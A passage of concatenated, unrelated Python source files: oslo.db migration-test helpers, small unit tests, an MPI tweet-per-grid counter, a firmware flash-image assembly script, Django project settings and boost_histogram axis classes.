`setUp` method will work.
Example of implementation:
def migrate_engine(self):
return self.engine
:returns: sqlalchemy engine instance
"""
pass
def _walk_versions(self, snake_walk=False, downgrade=True):
"""Check if migration upgrades and downgrades successfully.
DEPRECATED: this function is deprecated and will be removed from
oslo.db in a few releases. Please use walk_versions() method instead.
"""
self.walk_versions(snake_walk, downgrade)
def _migrate_down(self, version, with_data=False):
"""Migrate down to a previous version of the db.
DEPRECATED: this function is deprecated and will be removed from
oslo.db in a few releases. Please use migrate_down() method instead.
"""
return self.migrate_down(version, with_data)
def _migrate_up(self, version, with_data=False):
"""Migrate up to a new version of the db.
DEPRECATED: this function is deprecated and will be removed from
oslo.db in a few releases. Please use migrate_up() method instead.
"""
self.migrate_up(version, with_data)
def walk_versions(self, snake_walk=False, downgrade=True):
"""Check if migration upgrades and downgrades successfully.
Determine the latest version script from the repo, then
upgrade from 1 through to the latest, with no data
in the databases. This just checks that the schema itself
upgrades successfully.
`walk_versions` calls `migrate_up` and `migrate_down` with
`with_data` argument to check changes with data, but these methods
can be called without any extra check outside of `walk_versions`
method.
:param snake_walk: enables checking that each individual migration can
be upgraded/downgraded by itself.
If we have ordered migrations 123abc, 456def, 789ghi and we run
upgrading with the `snake_walk` argument set to `True`, the
migrations will be applied in the following order:
`123abc => 456def => 123abc =>
456def => 789ghi => 456def => 789ghi`
:type snake_walk: bool
:param downgrade: Check downgrade behavior if True.
:type downgrade: bool
"""
# Place the database under version control
self.migration_api.version_control(self.migrate_engine,
self.REPOSITORY,
self.INIT_VERSION)
self.assertEqual(self.INIT_VERSION,
self.migration_api.db_version(self.migrate_engine,
self.REPOSITORY))
LOG.debug('latest version is %s', self.REPOSITORY.latest)
versions = range(int(self.INIT_VERSION) + 1,
int(self.REPOSITORY.latest) + 1)
for version in versions:
# upgrade -> downgrade -> upgrade
self.migrate_up(version, with_data=True)
if snake_walk:
downgraded = self.migrate_down(version - 1, with_data=True)
if downgraded:
self.migrate_up(version)
if downgrade:
# Now walk it back down to 0 from the latest, testing
# the downgrade paths.
for version in reversed(versions):
# downgrade -> upgrade -> downgrade
downgraded = self.migrate_down(version - 1)
if snake_walk and downgraded:
self.migrate_up(version)
self.migrate_down(version - 1)
def migrate_down(self, version, with_data=False):
"""Migrate down to a previous version of the db.
:param version: id of revision to downgrade.
:type version: str
:keyword with_data: Whether to verify the absence of changes from
migration(s) being downgraded, see
:ref:`auxiliary-dynamic-methods <Auxiliary Methods>`.
:type with_data: Bool
"""
try:
self.migration_api.downgrade(self.migrate_engine,
self.REPOSITORY, version)
except NotImplementedError:
# NOTE(sirp): some migrations, namely release-level
# migrations, don't support a downgrade.
return False
self.assertEqual(version, self.migration_api.db_version(
self.migrate_engine, self.REPOSITORY))
# NOTE(sirp): `version` is what we're downgrading to (i.e. the 'target'
# version). So if we have any downgrade checks, they need to be run for
# the previous (higher numbered) migration.
if with_data:
post_downgrade = getattr(
self, "_post_downgrade_%03d" % (version + 1), None)
if post_downgrade:
post_downgrade(self.migrate_engine)
return True
def migrate_up(self, version, with_data=False):
"""Migrate up to a new version of the db.
:param version: id of revision to upgrade.
:type version: str
:keyword with_data: Whether to verify the applied changes with data,
see :ref:`auxiliary-dynamic-methods <Auxiliary Methods>`.
:type with_data: Bool
"""
# NOTE(sdague): try block is here because it's impossible to debug
# where a failed data migration happens otherwise
try:
if with_data:
data = None
pre_upgrade = getattr(
self, "_pre_upgrade_%03d" % version, None)
if pre_upgrade:
data = pre_upgrade(self.migrate_engine)
self.migration_api.upgrade(self.migrate_engine,
self.REPOSITORY, version)
self.assertEqual(version,
self.migration_api.db_version(self.migrate_engine,
self.REPOSITORY))
if with_data:
check = getattr(self, "_check_%03d" % version, None)
if check:
check(self.migrate_engine, data)
except exc.DbMigrationError:
msg = _LE("Failed to migrate to version %(ver)s on engine %(eng)s")
LOG.error(msg, {"ver": version, "eng": self.migrate_engine})
raise
@six.add_metaclass(abc.ABCMeta)
class ModelsMigrationsSync(object):
"""A helper class for comparison of DB migration scripts and models.
It's intended to be inherited by test cases in target projects. They have
to provide implementations for methods used internally in the test (as
we have no way to implement them here).
test_model_sync() will run migration scripts for the engine provided and
then compare the given metadata to the one reflected from the database.
The difference between MODELS and MIGRATION scripts will be printed and
the test will fail, if the difference is not empty. The return value is
really a list of actions, that should be performed in order to make the
current database schema state (i.e. migration scripts) consistent with
models definitions. It's left up to developers to analyze the output and
decide whether the models definitions or the migration scripts should be
modified to make them consistent.
Output::
[(
'add_table',
description of the table from models
),
(
'remove_table',
description of the table from database
),
(
'add_column',
schema,
table name,
column description from models
),
(
'remove_column',
schema,
table name,
column description from database
),
(
'add_index',
description of the index from models
),
(
'remove_index',
description of the index from database
),
(
'add_constraint',
description of constraint from models
),
(
'remove_constraint,
description of constraint from database
),
(
'modify_nullable',
schema,
table name,
column name,
{
'existing_type': type of the column from database,
'existing_server_default': default value from database
},
nullable from database,
nullable from models
),
(
'modify_type',
schema,
table name,
column name,
{
'existing_nullable': database nullable,
'existing_server_default': default value from database
},
database column type,
type of the column from models
),
(
'modify_default',
schema,
table name,
column name,
{
'existing_nullable': database nullable,
'existing_type': type of the column from database
},
connection column default value,
default from models
)]
Method include_object() can be overridden to exclude some tables from
comparison (e.g. migrate_repo).
"""
@abc.abstractmethod
def db_sync(self, engine):
"""Run migration scripts with the given engine instance.
This method must be implemented in subclasses and run migration scripts
for a DB the given engine is connected to.
"""
@abc.abstractmethod
def get_engine(self):
"""Return the engine instance to be used when running tests.
This method must be implemented in subclasses and return an engine
instance to be used when running tests.
"""
@abc.abstractmethod
def get_metadata(self):
"""Return the metadata instance to be used for schema comparison.
This method must be implemented in subclasses and return the metadata
instance attached to the BASE model.
"""
def include_object(self, object_, name, type_, reflected, compare_to):
"""Return True for objects that should be compared.
:param object_: a SchemaItem object such as a Table or Column object
:param name: the name of the object
:param type_: a string describing the type of object (e.g. "table")
:param reflected: True if the given object was produced based on
table reflection, False if it's from a local
MetaData object
:param compare_to: the object being compared against, if available,
else None
"""
return True
def compare_type(self, ctxt, insp_col, meta_col, insp_type, meta_type):
"""Return True if types are different, False if not.
Return None to allow the default implementation to compare these types.
:param ctxt: alembic MigrationContext instance
:param insp_col: reflected column
:param meta_col: column from model
:param insp_type: reflected column type
:param meta_type: column type from model
"""
# some backends (e.g. mysql) don't provide native boolean type
BOOLEAN_METADATA = (types.BOOLEAN, types.Boolean)
BOOLEAN_SQL = BOOLEAN_METADATA + (types.INTEGER, types.Integer)
if issubclass(type(meta_type), BOOLEAN_METADATA):
return not issubclass(type(insp_type), BOOLEAN_SQL)
return None # tells alembic to use the default comparison method
def compare_server_default(self, ctxt, ins_col, meta_col,
insp_def, meta_def, rendered_meta_def):
"""Compare default values between model and db table.
Return True if the defaults are different, False if not, or None to
allow the default implementation to compare these defaults.
:param ctxt: alembic MigrationContext instance
:param insp_col: reflected column
:param meta_col: column from model
:param insp_def: reflected column default value
:param meta_def: column default value from model
:param rendered_meta_def: rendered column default value (from model)
"""
return self._compare_server_default(ctxt.bind, meta_col, insp_def,
meta_def)
@utils.DialectFunctionDispatcher.dispatch_for_dialect("*")
def _compare_server_default(bind, meta_col, insp_def, meta_def):
pass
@_compare_server_default.dispatch_for('mysql')
def _compare_server_default(bind, meta_col, insp_def, meta_def):
if isinstance(meta_col.type, sqlalchemy.Boolean):
if meta_def is None or insp_def is None:
return meta_def != insp_def
return not (
isinstance(meta_def.arg, expr.True_) and insp_def == "'1'" or
isinstance(meta_def.arg, expr.False_) and insp_def == "'0'"
)
if isinstance(meta_col.type, sqlalchemy.Integer):
if meta_def is None or insp_def is None:
return meta_def != insp_def
return meta_def.arg != insp_def.split("'")[1]
@_compare_server_default.dispatch_for('postgresql')
def _compare_server_default(bind, meta_col, insp_def, meta_def):
if isinstance(meta_col.type, sqlalchemy.Enum):
if meta_def is None or insp_def is None:
return meta_def != insp_def
return insp_def != "'%s'::%s" % (meta_def.arg, meta_col.type.name)
elif isinstance(meta_col.type, sqlalchemy.String):
if meta_def is None or insp_def is None:
return meta_def != insp_def
return insp_def != "'%s'::character varying" % meta_def.arg
FKInfo = collections.namedtuple('fk_info', ['constrained_columns',
'referred_table',
'referred_columns'])
def check_foreign_keys(self, metadata, bind):
"""Compare foreign keys between model and db table.
:returns: a list that contains information about:
* should be a new key added or removed existing,
* name of that key,
* source table,
* referred table,
* constrained columns,
* referred columns
Output::
[('drop_key',
'testtbl_fk_check_fkey',
'testtbl',
fk_info(constrained_columns=(u'fk_check',),
referred_table=u'table',
referred_columns=(u'fk_check',)))]
DEPRECATED: this function is deprecated and will be removed from
oslo.db in a few releases. Alembic autogenerate.compare_metadata()
now includes foreign key comparison directly.
"""
diff = []
insp = sqlalchemy.engine.reflection.Inspector.from_engine(bind)
# Get all tables from db
db_tables = insp.get_table_names()
# Get all tables from models
model_tables = metadata.tables
for table in db_tables:
if table not in model_tables:
continue
# Get all necessary information about key of current table from db
fk_db = dict((self._get_fk_info_from_db(i), i['name'])
for i in insp.get_foreign_keys(table))
fk_db_set = set(fk_db.keys())
# Get all necessary information about key of current table from
# models
fk_models = dict((self._get_fk_info_from_model(fk), fk)
for fk in model_tables[table].foreign_keys)
fk_models_set = set(fk_models.keys())
for key in (fk_db_set - fk_models_set):
diff.append(('drop_key', fk_db[key], table, key))
LOG.info(("Detected removed foreign key %(fk)r on "
"table %(table)r"), {'fk': fk_db[key],
'table': table})
for key in (fk_models_set - fk_db_set):
diff.append(('add_key', fk_models[key], table, key))
LOG.info((
"Detected added foreign key for column %(fk)r on table "
"%(table)r"), {'fk': fk_models[key].column.name,
'table': table})
return diff
def _get_fk_info_from_db(self, fk):
return self.FKInfo(tuple(fk['constrained_columns']),
fk['referred_table'],
tuple(fk['referred_columns']))
def _get_fk_info_from_model(self, fk):
return self.FKInfo((fk.parent.name,), fk.column.table.name,
(fk.column.name,))
def filter_metadata_diff(self, diff):
"""Filter changes before assert in test_models_sync().
Allow subclasses to whitelist/blacklist changes. By default, no
filtering is performed, changes are returned as is.
:param diff: a list of differences (see `compare_metadata()` docs for
details on format)
:returns: a list of differences
"""
return diff
def test_models_sync(self):
# recent versions of sqlalchemy and alembic are needed for running of
# this test, but we already have them in requirements
try:
pkg.require('sqlalchemy>=0.8.4', 'alembic>=0.6.2')
except (pkg.VersionConflict, pkg.DistributionNotFound) as e:
self.skipTest('sqlalchemy>=0.8.4 and alembic>=0.6.3 are required'
' for running of this test: %s' % e)
# drop all tables after a test run
self.addCleanup(functools.partial(self.db.backend.drop_all_objects,
self.get_engine()))
# run migration scripts
self.db_sync(self.get_engine())
with self.get_engine().connect() as conn:
opts = {
'include_object': self.include_object,
'compare_type': self.compare_type,
'compare_server_default': self.compare_server_default,
}
mc = alembic.migration.MigrationContext.configure(conn, opts=opts)
# compare schemas and fail with diff, if it's not empty
diff = self.filter_metadata_diff(
alembic.autogenerate.compare_metadata(mc, self.get_metadata()))
if diff:
msg = pprint.pformat(diff, indent=2, width=20)
self.fail(
"Models and migration scripts aren't in sync:\n%s" % msg)
|
from synchp.settings import Settings
def test_parse_config_file():
Settings.init("synch.yaml")
def test_settings():
assert isinstance(Settings.debug(), bool)
assert isinstance(Settings.insert_num(), int)
assert isinstance(Settings.insert_interval(), int)
|
from mpi4py import MPI
import json
import re
from collections import Counter as c
from collections import Counter, defaultdict
from collections import OrderedDict
import time
import sys
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
grids = {}
gridCounter = {}
hashtagCounter = {}
start_time = time.time()
# Parse the gird info from the melbGrid.json
def loadGrid():
with open("melbGrid.json") as f:
info = json.load(f)
# intialize the data structure that used for counting
for i in info["features"]:
grid = i["properties"]['id']
grids[grid] = i["properties"]
gridCounter[grid] = 0
hashtagCounter[grid] = {}
hashtagCounter[grid]["total"] = 0
# start processing
twitterProcessor()
# Parse the file line by line, avoid parse the whole file directly
def twitterProcessor():
lineNum = 0
assignedLine = rank
print(sys.argv[0])
with open(sys.argv[1]) as f:
for line in f:
if assignedLine == lineNum:
assignedLine = assignedLine + size
# exclude the first line and the last line of the file
if not parseCoordinates(line) is None:
x , y = parseCoordinates(line)
grid = checkWhichGrid(x, y)
# count how many twitter in each grid
countPerGrid(grid)
# parse string that contains the hash tag
parsedJSON = parseHashTag(line)
# count hash tag in the each grid
countHashTagPerGrid(parsedJSON, grid)
lineNum += 1;
collectResult()
# collect result from the other processes into master process
def collectResult():
c1 = c()
c2 = defaultdict(c)
sortedKey = []
gridResult = comm.gather(gridCounter, root=0)
hashtagResult = comm.gather(hashtagCounter, root=0)
if rank == 0:
for r in gridResult:
c1 = c1 + c(r)
for item in hashtagResult:
for k,d in item.items():
c2[k].update(d)
c2[k].most_common()
print("##########Rank of grids##########")
for k,v in c1.most_common():
print(k, v)
print("##########Rank of hash tags##########")
# print rank of tags
sortedc2 = OrderedDict(sorted(c2.items(), key=lambda x: x[1]['total'], reverse=True))
for k in sortedc2:
if (len(sortedc2[k]) > 5):
print(k, list(sortedc2[k].most_common())[1:6])
else:
print(k, list(sortedc2[k].most_common())[1:len(sortedc2[k])-1])
total = time.time() - start_time
minutes, seconds = divmod(total, 60)
print("time takes: %02d minutes and %02d seconds"%(minutes, seconds))
def parseCoordinates(line):
match = re.search(r'\"type\":\"Point\",\"coordinates\":\[(.*?)\]', line)
if match:
parsed = json.loads('{' + match.group() + '}')
return parsed["coordinates"][0], parsed["coordinates"][1]
def countPerGrid(c):
if c in gridCounter.keys():
gridCounter[c] += 1
def checkWhichGrid(x, y):
for c in gridCounter:
if (x >= grids[c]['xmin'] and x <= grids[c]['xmax']) \
and (y <= grids[c]['ymax'] and y >= grids[c]['ymin']):
return c
return None
# Parse the file line by line, avoid parse the whole file directly
def parseHashTag(line):
extractedStr = ""
match = re.search(r'\"hashtags\":\[(.*?)\]',line)
if match is not None and not closedBracketIndex(match.group()) == match.group():
matchRest = re.search(r'\"hashtags\":\[.*',line)
extractedStr = closedBracketIndex(matchRest.group())
if not extractedStr == "":
parsedJSON = json.loads('{'+ extractedStr +'}')
return parsedJSON
def countHashTagPerGrid(parsedJSON, grid):
if not parsedJSON is None and not grid is None:
for i in parsedJSON["hashtags"]:
tag = i["text"]
hashtagCounter[grid]["total"] = hashtagCounter[grid]["total"] + 1
if tag in hashtagCounter[grid]:
hashtagCounter[grid][tag] += 1
else:
hashtagCounter[grid][tag] = 1
# match the closed bracket in a JSON string
def closedBracketIndex(str):
c = 0
index = 0
for i in str:
index += 1
if i == "[":
c += 1
elif i == "]" and not c == 0:
c -= 1
if c == 0:
break
if c < 0:
return 0
if c == 0:
return str[0:index]
else:
return 0
loadGrid() |
#!/bin/env python3
from mempatch import *
import struct
flashes = [
("bin/internal.bin", 0x00200000),
("bin/external.bin", 0x90000000, 0x800000)
]
files = [
("bin/pkey.bin", 0x00208ac8),
("bin/kernel0.bin", 0x90000008),
("bin/kernel1.bin", 0x90400008),
("bin/exam0.bin", 0x903F0000),
("bin/exam1.bin", 0x907F0000)
]
mem_area = load_areas(flashes)
load_files(files, mem_area)
offset0 = file_length("bin/kernel0.bin")
sign0_addr = 0x90000008 + offset0
offset1 = file_length("bin/kernel1.bin")
sign1_addr = 0x90400008 + offset1
files = [
("bin/sign0.bin", sign0_addr),
("bin/sign1.bin", sign1_addr)
]
overwrite_data_at_address(mem_area, 0x90000000, struct.pack("<II", 0, offset0))
overwrite_data_at_address(mem_area, 0x90400000, struct.pack("<II", 0, offset1))
load_files(files, mem_area)
save_areas(mem_area)
|
import os
import unittest
from unittest.mock import Mock, patch
from cache_gs.cache_classes.cache_data_file import CacheData, CacheDataFile
from tests.test_tools import raise_test_exception
def force_exception(*args, **kwargs):
raise_test_exception()
class TestCacheDataFile(unittest.TestCase):
def setUp(self):
self.file_name = 'test.json'
def tearDown(self):
if os.path.isfile(self.file_name):
os.unlink(self.file_name)
def test_save(self):
cd = CacheData("test_section", "test_key", "test_value", 0)
cdf = CacheDataFile('test', cd)
self.assertTrue(cdf.save(self.file_name))
cdf2 = CacheDataFile(self.file_name)
self.assertEqual(cdf.data, cdf2.data)
def test_repr(self):
cd = CacheData('sec', 'key', 'value', 0)
cdf = CacheDataFile('test', cd)
self.assertEqual(
repr(cdf),
"CacheDataFile('test',CacheData('sec','key','value',0))")
@patch("os.path.isfile", Mock())
def test_load_exception(self):
os.path.isfile.return_value = True
cdf = CacheDataFile()
self.assertFalse(cdf.load('abcd'))
@patch("json.dumps", force_exception)
def test_save_exception(self):
cd = CacheData("sec", "key", "value", 0)
cdf = CacheDataFile(cache_data=cd)
self.assertFalse(cdf.save('abcd'))
if os.path.isfile('abcd'):
os.unlink('abcd')
|
"""
Django settings for socialdistribution project.
Generated by 'django-admin startproject' using Django 3.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
from dotenv import load_dotenv
import django_on_heroku
import django_on_heroku
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
load_dotenv()
# env variables
SECRET_KEY = os.environ.get("SECRET_KEY")
DEBUG = (os.environ.get("DEBUG") == 'True')
GITHUB_URL = os.environ.get("GITHUB_URL")
HOST_API_URL = os.environ.get("HOST_API_URL")
HOST_URL = os.environ.get("HOST_URL")
API_TOKEN = os.environ.get("API_TOKEN")
TEAM_12_TOKEN = os.environ.get("TEAM_12_TOKEN")
TEAM_18_TOKEN = os.environ.get("TEAM_18_TOKEN")
TEAM_02_TOKEN = os.environ.get("TEAM_02_TOKEN")
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'app.apps.AppConfig',
'api.apps.ApiConfig',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'friendship',
'crispy_forms',
'drf_yasg',
'corsheaders',
]
CRISPY_TEMPLATE_PACK = 'bootstrap4'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.cache.FetchFromCacheMiddleware',
]
CACHE_MIDDLEWARE_SECONDS = 1
ROOT_URLCONF = 'socialdistribution.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'socialdistribution.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Edmonton'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
LOGIN_URL = '/app/accounts/login/'
LOGIN_REDIRECT_URL = '/app/'
LOGOUT_REDIRECT_URL = '/app/'
AUTH_USER_MODEL = 'api.User'
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10,
'DEFAULT_THROTTLE_CLASSES': [
'rest_framework.throttling.AnonRateThrottle',
'rest_framework.throttling.UserRateThrottle'
],
'DEFAULT_THROTTLE_RATES': {
'anon': '1/second', #1/second
'user': '1/second', #1/second
}
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
'OPTIONS': {
'server_max_value_length': 1024 * 1024 * 1024 * 1,
}
}
}
CORS_ORIGIN_ALLOW_ALL = True
django_on_heroku.settings(locals(), test_runner=False) # bottom of the file
|
from __future__ import absolute_import, division, print_function
del absolute_import, division, print_function
from .._core.axis import options
from .._core import axis as ca
from .kwargs import KWArgs
from .sig_tools import inject_signature
from .axis_transform import AxisTransform
from .utils import cast, register, set_family, MAIN_FAMILY, CPP_FAMILY, set_module
import copy
# Contains common methods and properties to all axes
@set_module("boost_histogram.axis")
class Axis(object):
__slots__ = ("_ax",)
def __copy__(self):
other = self.__class__.__new__(self.__class__)
other._ax = copy.copy(self._ax)
return other
def index(self, value):
"""
Return the fractional index(es) given a value (or values) on the axis.
"""
return self._ax.index(value)
def value(self, index):
"""
Return the value(s) given an (fractional) index (or indices).
"""
return self._ax.value(index)
def bin(self, index):
"""
Return the edges of the bins as a tuple for a
continuous axis or the bin value for a
non-continuous axis, when given an index.
"""
return self._ax.bin(index)
def __eq__(self, other):
return self._ax == other._ax
def __ne__(self, other):
return self._ax != other._ax
@property
def metadata(self):
"""
Get or set the metadata associated with this axis.
"""
return self._ax.metadata
@metadata.setter
def metadata(self, value):
self._ax.metadata = value
@classmethod
def _convert_cpp(cls, cpp_object):
nice_ax = cls.__new__(cls)
nice_ax._ax = cpp_object
return nice_ax
def __len__(self):
return self._ax.size
def __iter__(self):
return self._ax.__iter__()
# Mixin for main style classes
# Contains common methods and properties to all Main module axes
class MainAxisMixin(object):
__slots__ = ()
def __repr__(self):
return "{self.__class__.__name__}({args}{kwargs})".format(
self=self, args=self._repr_args(), kwargs=self._repr_kwargs()
)
def _repr_kwargs(self):
"""
Return options for use in repr. Metadata is last,
just in case it spans multiple lines.
"""
ret = ""
if self.options.growth:
ret += ", growth=True"
elif self.options.circular:
ret += ", circular=True"
else:
if not self.options.underflow:
ret += ", underflow=False"
if not self.options.overflow:
ret += ", overflow=False"
if self.metadata is not None:
ret += ", metadata={0!r}".format(self.metadata)
return ret
@property
def options(self):
"""
Return the options. Fields:
.underflow - True if axes captures values that are too small
.overflow - True if axes captures values that are too large
(or non-valid for category axes)
.growth - True if axis can grow
.circular - True if axis wraps around
"""
return self._ax.options
@property
def size(self):
"""
Return number of bins excluding under- and overflow.
"""
return self._ax.size
@property
def extent(self):
"""
Return number of bins including under- and overflow.
"""
return self._ax.extent
def __getitem__(self, i):
"""
Access a bin, using normal Python syntax for wraparound.
"""
# UHI support
if callable(i):
i = i(self)
else:
if i < 0:
i += self._ax.size
if i >= self._ax.size:
raise IndexError(
"Out of range access, {0} is more than {1}".format(i, self._ax.size)
)
return self.bin(i)
@property
def edges(self):
return self._ax.edges
@property
def centers(self):
"""
An array of bin centers.
"""
return self._ax.centers
@property
def widths(self):
"""
An array of bin widths.
"""
return self._ax.widths
# Contains all common methods for cpp module axes
class CppAxisMixin(object):
__slots__ = ()
def __repr__(self):
return repr(self._ax)
def options(self):
"""
Return the options. Fields:
.underflow - True if axes captures values that are too small
.overflow - True if axes captures values that are too large
(or non-valid for category axes)
.growth - True if axis can grow
.circular - True if axis wraps around
"""
return self._ax.options
def size(self):
"""
Return number of bins excluding under- and overflow.
"""
return self._ax.size
def extent(self):
"""
Return number of bins including under- and overflow.
"""
return self._ax.extent
def edges(self):
return self._ax.edges
def centers(self):
"""
An array of bin centers.
"""
return self._ax.centers
def widths(self):
"""
An array of bin widths.
"""
return self._ax.widths
# Contains all common methods and properties for Regular axes
@register(
{
ca.regular_uoflow,
ca.regular_uoflow_growth,
ca.regular_uflow,
ca.regular_oflow,
ca.regular_none,
ca.regular_numpy,
ca.regular_pow,
ca.regular_trans,
ca.regular_circular,
}
)
class BaseRegular(Axis):
__slots__ = ()
@inject_signature(
"self, bins, start, stop, *, metadata=None, underflow=True, overflow=True, growth=False, circular=False, transform=None"
)
def __init__(self, bins, start, stop, **kwargs):
"""
Make a regular axis with nice keyword arguments for underflow,
overflow, and growth.
Parameters
----------
bins : int
The number of bins between start and stop
start : float
The beginning value for the axis
stop : float
The ending value for the axis
metadata : Any
Any Python object to attach to the axis, like a label.
underflow : bool = True
Enable the underflow bin
overflow : bool = True
Enable the overflow bin
growth : bool = False
Allow the axis to grow if a value is encountered out of range.
Be careful, the axis will grow as large as needed.
circular : bool = False
Filling wraps around.
transform : Optional[AxisTransform] = None
Transform the regular bins (Log, Sqrt, and Pow(v))
"""
with KWArgs(kwargs) as k:
metadata = k.optional("metadata")
transform = k.optional("transform")
options = k.options(
underflow=True, overflow=True, growth=False, circular=False
)
if transform is not None:
if options != {"underflow", "overflow"}:
raise KeyError("Transform supplied, cannot change other options")
if (
not isinstance(transform, AxisTransform)
and AxisTransform in transform.__bases__
):
raise TypeError("You must pass an instance, use {}()".format(transform))
self._ax = transform._produce(bins, start, stop, metadata)
elif options == {"growth", "underflow", "overflow"}:
self._ax = ca.regular_uoflow_growth(bins, start, stop, metadata)
elif options == {"underflow", "overflow"}:
self._ax = ca.regular_uoflow(bins, start, stop, metadata)
elif options == {"underflow"}:
self._ax = ca.regular_uflow(bins, start, stop, metadata)
elif options == {"overflow"}:
self._ax = ca.regular_oflow(bins, start, stop, metadata)
elif options == {
"circular",
"underflow",
"overflow",
} or options == { # growth=True should work
"circular",
"overflow",
}: # growth=True, underflow=False is also correct
self._ax = ca.regular_circular(bins, start, stop, metadata)
elif options == set():
self._ax = ca.regular_none(bins, start, stop, metadata)
else:
raise KeyError("Unsupported collection of options")
@set_module("boost_histogram.axis")
@set_family(MAIN_FAMILY)
class Regular(BaseRegular, MainAxisMixin):
__slots__ = ()
def _repr_args(self):
"Return inner part of signature for use in repr"
return "{bins:g}, {start:g}, {stop:g}".format(
bins=self.size, start=self.edges[0], stop=self.edges[-1]
)
def _repr_kwargs(self):
ret = super(Regular, self)._repr_kwargs()
if self.transform is not None:
ret += ", transform={0}".format(self.transform)
return ret
@property
def transform(self):
if hasattr(self._ax, "transform"):
return cast(self, self._ax.transform, AxisTransform)
return None
@set_module("boost_histogram.cpp.axis")
@set_family(CPP_FAMILY)
class regular(BaseRegular, CppAxisMixin):
__slots__ = ()
def transform(self):
if hasattr(self._ax, "transform"):
return cast(self, self._ax.transform, AxisTransform)
return None
@register(
{
ca.variable_none,
ca.variable_uflow,
ca.variable_oflow,
ca.variable_uoflow,
ca.variable_uoflow_growth,
ca.variable_circular,
}
)
class BaseVariable(Axis):
__slots__ = ()
@inject_signature(
"self, edges, *, metadata=None, underflow=True, overflow=True, growth=False"
)
def __init__(self, edges, **kwargs):
"""
Make an axis with irregularly spaced bins. Provide a list
or array of bin edges, and len(edges)-1 bins will be made.
Parameters
----------
edges : Array[float]
The edges for the bins. There will be one less bin than edges.
metadata : object
Any Python object to attach to the axis, like a label.
underflow : bool = True
Enable the underflow bin
overflow : bool = True
Enable the overflow bin
circular : bool = False
Enable wraparound
growth : bool = False
Allow the axis to grow if a value is encountered out of range.
Be careful, the axis will grow as large as needed.
"""
with KWArgs(kwargs) as k:
metadata = k.optional("metadata")
options = k.options(
underflow=True, overflow=True, circular=False, growth=False
)
if options == {"growth", "underflow", "overflow"}:
self._ax = ca.variable_uoflow_growth(edges, metadata)
elif options == {"underflow", "overflow"}:
self._ax = ca.variable_uoflow(edges, metadata)
elif options == {"underflow"}:
self._ax = ca.variable_uflow(edges, metadata)
elif options == {"overflow"}:
self._ax = ca.variable_oflow(edges, metadata)
elif options == {
"circular",
"underflow",
"overflow",
} or options == { # growth=True should work
"circular",
"overflow",
}: # growth=True, underflow=False is also correct
self._ax = ca.variable_circular(edges, metadata)
elif options == set():
self._ax = ca.variable_none(edges, metadata)
else:
raise KeyError("Unsupported collection of options")
@set_family(MAIN_FAMILY)
@set_module("boost_histogram.axis")
class Variable(BaseVariable, MainAxisMixin):
__slots__ = ()
def _repr_args(self):
"Return inner part of signature for use in repr"
if len(self) > 20:
return repr(self.edges)
else:
return "[{}]".format(", ".join(format(v, "g") for v in self.edges))
@set_family(CPP_FAMILY)
@set_module("boost_histogram.cpp.axis")
class variable(BaseVariable, CppAxisMixin):
__slots__ = ()
@register(
{
ca.integer_none,
ca.integer_uflow,
ca.integer_oflow,
ca.integer_uoflow,
ca.integer_growth,
ca.integer_circular,
}
)
class BaseInteger(Axis):
__slots__ = ()
@inject_signature(
"self, start, stop, *, metadata=None, underflow=True, overflow=True, growth=False"
)
def __init__(self, start, stop, **kwargs):
"""
Make an integer axis, with a collection of consecutive integers.
Parameters
----------
start : int
The beginning value for the axis
stop : int
The ending value for the axis. (start-stop) bins will be created.
metadata : object
Any Python object to attach to the axis, like a label.
underflow : bool = True
Enable the underflow bin
overflow : bool = True
Enable the overflow bin
circular : bool = False
Enable wraparound
growth : bool = False
Allow the axis to grow if a value is encountered out of range.
Be careful, the axis will grow as large as needed.
"""
with KWArgs(kwargs) as k:
metadata = k.optional("metadata")
options = k.options(
underflow=True, overflow=True, circular=False, growth=False
)
# underflow and overflow settings are ignored, integers are always
